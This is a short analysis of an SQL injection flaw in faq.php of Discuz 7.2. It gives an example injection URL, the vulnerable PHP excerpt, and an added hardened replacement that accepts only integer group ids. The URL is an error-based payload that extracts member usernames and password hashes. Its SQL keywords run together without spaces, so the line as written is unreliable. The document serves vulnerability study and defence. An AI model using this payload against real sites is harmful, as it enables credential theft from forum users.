Analysis of the SQL Injection Vulnerability in faq.php of Discuz 7.2
Example injection request:
https://www.nhooo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and(select1from(selectcount(*),concat((select(select(selectconcat(username,0x20,password)fromcdb_memberslimit0,1))from`information_schema`.tableslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23
Vulnerability analysis (by phithon):
    if ($action == 'grouppermission') {
        ...
        ksort($gids);
        $groupids = array();
        foreach ($gids as $row) {
            // No type check: if $row is a string, $row[0] is its first character.
            $groupids[] = $row[0];
        }

        // The collected values are concatenated directly into the IN (...) list.
        $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
        ...
    }

    function implodeids($array) {
        if (!empty($array)) {
            return "'".implode("','", is_array($array) ? $array : array($array))."'";
        } else {
            return '';
        }
    }
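The excerpt above reads `$row[0]` from every `gids` entry without checking its type and then concatenates the results into the `IN (...)` list. The following is an added example of a hardened replacement for that loop, not Discuz's own patch and not code from the original analysis; `collect_group_ids()` and `build_in_list()` are hypothetical helper names, and the sample inputs are constructed.

```php
<?php
// Added example (not Discuz code): accept only integer group ids from gids.
// collect_group_ids() and build_in_list() are hypothetical helper names.

function collect_group_ids($gids) {
    $groupids = array();
    if (!is_array($gids)) {
        return $groupids;
    }
    ksort($gids);
    foreach ($gids as $row) {
        // Each entry must be an array whose element 0 is a scalar. A plain
        // string is rejected, so [0] can never yield a single character.
        if (!is_array($row) || !isset($row[0]) || !is_scalar($row[0])) {
            continue;
        }
        // Digits only, so the value cannot carry quotes, backslashes or SQL.
        if (!preg_match('/^[0-9]+$/D', (string) $row[0])) {
            continue;
        }
        $groupids[] = (int) $row[0];
    }
    return array_values(array_unique($groupids));
}

function build_in_list(array $ids) {
    // Integers need no quoting; intval() is a second line of defence.
    return implode(',', array_map('intval', $ids));
}

// Constructed sample inputs. $hostile has the same shape as the request on
// this page: one string entry and one array entry with non-numeric content.
$benign  = array(2 => array('7'), 1 => array(3));
$hostile = array(99 => "\\'", 100 => array(') and (constructed)#'));

$tablepre = 'cdb_'; // assumed table prefix for the demonstration

foreach (array('benign' => $benign, 'hostile' => $hostile) as $label => $gids) {
    $ids = collect_group_ids($gids);
    if (empty($ids)) {
        // Skip the query entirely; an empty IN () is a SQL syntax error.
        echo "$label: no valid group ids, query skipped\n";
        continue;
    }
    echo "$label: SELECT * FROM {$tablepre}usergroups u WHERE u.groupid IN ("
        . build_in_list($ids) . ")\n";
}
```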